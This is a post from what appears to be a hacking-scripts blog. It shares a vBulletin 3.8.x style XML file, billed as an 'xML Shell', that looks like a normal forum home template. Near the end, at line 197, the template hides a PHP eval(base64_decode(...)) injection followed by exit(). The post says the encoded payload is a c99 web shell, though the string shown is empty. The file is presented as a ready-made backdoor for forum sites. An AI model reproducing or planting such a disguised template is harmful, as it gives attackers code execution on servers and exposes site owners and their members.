HackingScripts

Hack Scripts for everybody

xML Shell

19 Feb 2014

Well this is fascinating.. an XML shell! Version 3.8.7 – Coded by Hakam El Basrawy AKA h4k4m.

xML ShELL Source Code

  1 <?xml version="1.0" encoding="ISO-8859-1"?>
  2 <style name="~ xML ShELL bY h4k4m ~" vbversion="3.8.7" product="vb" type="custom">
  3 ALL vb-version=)> 3.8.0 t0 3.8.7  ... by Hakam El Basrawy
  4 - <templategroup name="/Forum Home">
  5 - <template name="FORUMHOME" templatetype="template" date="1194653840" username="Hakam" version="3.8.7">
  6 - <![CDATA[ $stylevar[htmldoctype]
  7 <html dir="$stylevar[textdirection]" lang="$stylevar[languagecode]">
  8 <head>
  9     <!-- no cache headers -->
 10     <meta http-equiv="Pragma" content="no-cache" />
 11     <meta http-equiv="Expires" content="-1" />
 12     <meta http-equiv="Cache-Control" content="no-cache" />
 13     <!-- end no cache headers -->
 14     $headinclude
 15     <title><phrase 1="$vboptions[bbtitle]">$vbphrase[x_powered_by_vbulletin]</phrase></title>
 16 </head>
 17 <body>
 18 $header
 19 $navbar
 20 
 21 <if condition="$show['guest']">
 22 <!-- guest welcome message -->
 23 <table class="tborder" cellpadding="$stylevar[cellpadding]" cellspacing="$stylevar[cellspacing]" border="0" width="100%" align="center">
 24 <tr>
 25     <td class="tcat"><phrase 1="$vboptions[bbtitle]">$vbphrase[welcome_to_the_x]</phrase></td>
 26 </tr>
 27 <tr>
 28     <td class="alt1">
 29         <phrase 1="faq.php$session[sessionurl_q]" 2="register.php$session[sessionurl_q]">$vbphrase[first_visit_message]</phrase>
 30     </td>
 31 </tr>
 32 </table>
 33 <!-- / guest welcome message -->
 34 <br />
 35 </if>
 36 
 37 <!-- main -->
 38 <table class="tborder" cellpadding="$stylevar[cellpadding]" cellspacing="$stylevar[cellspacing]" border="0" width="100%" align="center">
 39 <thead>
 40     <tr align="center">
 41       <td class="thead"> </td>
 42       <td class="thead" width="100%" align="$stylevar[left]">$vbphrase[forum]</td>
 43       <td class="thead" width="175">$vbphrase[last_post]</td>
 44       <td class="thead">$vbphrase[threads]</td>
 45       <td class="thead">$vbphrase[posts]</td>
 46       <if condition="$vboptions['showmoderatorcolumn']">
 47       <td class="thead">$vbphrase[moderator]</td>
 48       </if>
 49     </tr>
 50 </thead>
 51 $forumbits
 52 <tbody>
 53     <tr>
 54         <td class="tfoot" align="center" colspan="<if condition="$vboptions['showmoderatorcolumn']">6<else />5</if>"><div class="smallfont"><strong>
 55             <a href="forumdisplay.php?$session[sessionurl]do=markread" rel="nofollow">$vbphrase[mark_forums_read]</a>
 56             <if condition="$vboptions['forumleaders']">   
 57             <a href="showgroups.php$session[sessionurl_q]" rel="nofollow">$vbphrase[view_forum_leaders]</a></if>
 58         </strong></div></td>
 59     </tr>
 60 </tbody>
 61 </table>
 62 $forumhome_markread_script
 63 <!-- /main -->
 64 
 65 <br />
 66 <br />
 67 
 68 <!-- what's going on box -->
 69 <table class="tborder" cellpadding="$stylevar[cellpadding]" cellspacing="$stylevar[cellspacing]" border="0" width="100%" align="center">
 70 <thead>
 71     <tr>
 72         <td class="tcat" colspan="2">$vbphrase[whats_going_on]</td>
 73     </tr>
 74 </thead>
 75 <if condition="$show['loggedinusers']">
 76 <!-- logged-in users -->
 77 <tbody>
 78     <tr>
 79         <td class="thead" colspan="2">
 80             <a style="float:$stylevar[right]" href="#top" onclick="return toggle_collapse('forumhome_activeusers')"><img id="collapseimg_forumhome_activeusers" src="$stylevar[imgdir_button]/collapse_thead$vbcollapse[collapseimg_forumhome_activeusers].gif" alt="" border="0" /></a>
 81             <a href="online.php$session[sessionurl_q]" rel="nofollow">$vbphrase[currently_active_users]</a>: $totalonline (<phrase 1="$numberregistered" 2="$numberguest">$vbphrase[x_members_and_y_guests]</phrase>)
 82         </td>
 83     </tr>
 84 </tbody>
 85 <tbody id="collapseobj_forumhome_activeusers" style="$vbcollapse[collapseobj_forumhome_activeusers]">
 86     <tr>
 87         <td class="alt2"><a href="online.php$session[sessionurl_q]" rel="nofollow"><img src="$stylevar[imgdir_misc]/whos_online.gif" alt="$vbphrase[view_whos_online]" border="0" /></a></td>
 88         <td class="alt1" width="100%">
 89             <div class="smallfont">
 90                 <div style="white-space: nowrap"><phrase 1="$recordusers" 2="$recorddate" 3="$recordtime">$vbphrase[most_users_ever_online_was_x_y_at_z]</phrase></div>
 91                 <div>$activeusers</div>
 92             </div>
 93         </td>
 94     </tr>
 95 </tbody>
 96 <!-- end logged-in users -->
 97 </if>
 98 <tbody>
 99     <tr>
100         <td class="thead" colspan="2">
101             <a style="float:$stylevar[right]" href="#top" onclick="return toggle_collapse('forumhome_stats')"><img id="collapseimg_forumhome_stats" src="$stylevar[imgdir_button]/collapse_thead$vbcollapse[collapseimg_forumhome_stats].gif" alt="" border="0" /></a>
102             <phrase 1="$vboptions[bbtitle]">$vbphrase[x_statistics]</phrase>
103         </td>
104     </tr>
105 </tbody>
106 <tbody id="collapseobj_forumhome_stats" style="$vbcollapse[collapseobj_forumhome_stats]">
107     <tr>
108         <td class="alt2"><img src="$stylevar[imgdir_misc]/stats.gif" alt="<phrase 1="$vboptions[bbtitle]">$vbphrase[x_statistics]</phrase>" border="0" /></td>
109         <td class="alt1" width="100%">
110         <div class="smallfont">
111             <div>
112                 $vbphrase[threads]: $totalthreads,
113                 $vbphrase[posts]: $totalposts,
114                 $vbphrase[members]: $numbermembers<if condition="$show['activemembers']">,
115                     <span title="<phrase 1="$vboptions[activememberdays]">$vbphrase[within_the_last_x_days]</phrase>">$vbphrase[active_members]: $activemembers</span>
116                 </if>
117             </div>
118             <div><phrase 1="member.php?$session[sessionurl]u=$newuserid" 2="$newusername">$vbphrase[welcome_to_our_newest_member_x]</phrase></div>
119 <div class="smallfont">$cb_stats</div>
120         </div>
121         </td>
122     </tr>
123 </tbody>
124 <if condition="$show['birthdays']">
125 <!-- today's birthdays -->
126 <tbody>
127     <tr>
128         <td class="thead" colspan="2">
129             <a style="float:$stylevar[right]" href="#top" onclick="return toggle_collapse('forumhome_birthdays')"><img id="collapseimg_forumhome_birthdays" src="$stylevar[imgdir_button]/collapse_thead$vbcollapse[collapseimg_forumhome_birthdays].gif" alt="" border="0" /></a>
130             $vbphrase[todays_birthdays]
131         </td>
132     </tr>
133 </tbody>
134 <tbody id="collapseobj_forumhome_birthdays" style="$vbcollapse[collapseobj_forumhome_birthdays]">
135     <tr>
136         <td class="alt2"><a href="calendar.php?$session[sessionurl]do=getday&day=$today&sb=1"><img src="$stylevar[imgdir_misc]/birthday.gif" alt="$vbphrase[view_birthdays]" border="0" /></a></td>
137         <td class="alt1" width="100%"><div class="smallfont">$birthdays</div></td>
138     </tr>
139 </tbody>
140 <!-- end today's birthdays -->
141 </if>
142 <if condition="$show['upcomingevents']">
143 <tbody>
144     <tr>
145         <td class="thead" colspan="2">
146             <a style="float:$stylevar[right]" href="#top" onclick="return toggle_collapse('forumhome_events')"><img id="collapseimg_forumhome_events" src="$stylevar[imgdir_button]/collapse_thead$vbcollapse[collapseimg_forumhome_events].gif" alt="" border="0" /></a>
147             <if condition="$show['todaysevents']">$vbphrase[todays_events]<else /><phrase 1="$vboptions[showevents]">$vbphrase[upcoming_events_for_the_next_x_days]</phrase></if>
148         </td>
149     </tr>
150 </tbody>
151 <tbody id="collapseobj_forumhome_events" style="$vbcollapse[collapseobj_forumhome_events]">
152     <tr>
153         <td class="alt2"><a href="calendar.php$session[sessionurl_q]"><img src="$stylevar[imgdir_misc]/calendar.gif" alt="$vbphrase[calendar]" border="0" /></a></td>
154         <td class="alt1" width="100%"><div class="smallfont">$upcomingevents</div></td>
155     </tr>
156 </tbody>
157 </if>
158 </table>
159 <br />
160 <!-- end what's going on box -->
161 
162 <!-- icons and login code -->
163 <table cellpadding="0" cellspacing="2" border="0" width="100%">
164 <tr valign="bottom">
165     <td>
166         <table cellpadding="2" cellspacing="0" border="0">
167         <tr>
168             <td><img src="$stylevar[imgdir_statusicon]/forum_new.gif" alt="$vbphrase[contains_new_posts]" border="0" /></td>
169             <td class="smallfont">  $vbphrase[forum_contains_new_posts]</td>
170         </tr>
171         <tr>
172             <td><img src="$stylevar[imgdir_statusicon]/forum_old.gif" alt="$vbphrase[contains_no_new_posts]" border="0" /></td>
173             <td class="smallfont">  $vbphrase[forum_contains_no_new_posts]</td>
174         </tr>
175         <if condition="$vboptions['showlocks']">
176         <tr>
177             <td><img src="$stylevar[imgdir_statusicon]/forum_old_lock.gif" alt="$vbphrase[a_closed_forum]" border="0" /></td>
178             <td class="smallfont">  $vbphrase[forum_is_closed_for_posting]</td>
179         </tr>
180         </if>
181         </table>
182     </td>
183     <if condition="!$show['guest']">
184         <!-- member logout -->
185         <td align="$stylevar[right]"><a href="login.php?$session[sessionurl]do=logout&logouthash=$bbuserinfo[logouthash]"  onclick="return log_out('$vbphrase[sure_you_want_to_log_out]')"><phrase 1="$bbuserinfo[username]">$vbphrase[log_out_x]</phrase></a></td>
186         <!-- end member logout -->
187     </if>
188 </tr>
189 </table>
190 <!-- / icons and login code -->
191 
192 $footer
193 </body>
194 </html>
195 
196 $spacer_open
197 {${eval(base64_decode(''))}}{${exit()}}&
198 $_phpinclude_output
199   ]]> 
200   </template>
201   </templategroup>
202   </style>

The encrypted part is simply a c99 shell, by the way.